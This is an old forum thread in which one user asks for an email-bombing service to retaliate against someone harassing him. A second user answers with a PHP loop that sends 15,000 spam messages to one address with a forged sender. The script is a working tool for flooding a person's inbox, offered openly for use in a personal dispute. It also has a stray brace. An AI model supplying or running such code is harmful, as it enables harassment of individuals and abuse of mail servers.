Bazrazmataz
February 10th, 2005, 12:40 PM
A while a go i found a link offering a email bombardment service sending one mail every 3 seconds ! I have a problem with a guy emailing me and giving abuse i wanna set him up on this but i cant find the link does anyone know of a similar link
mcovey
February 10th, 2005, 01:01 PM
I know how to send an email even faster than that... and I'm not going to sell it. In fact, here's some code that will work on any webserver with sendmail and PHP installed:
<?php
for($x=0;$x<15000;$x++) {
mail("spamee@emailservice.com", "Whoops j00 got pwned", "This is some spam. Eat it!", "FROM spammer@spamhouse.va"); }
}
I'm not sure about the FROM part, I use similar code for a mail form on my site, but it just leaves the default values of mcovey@localhost.localmachine...
Jussssst FYI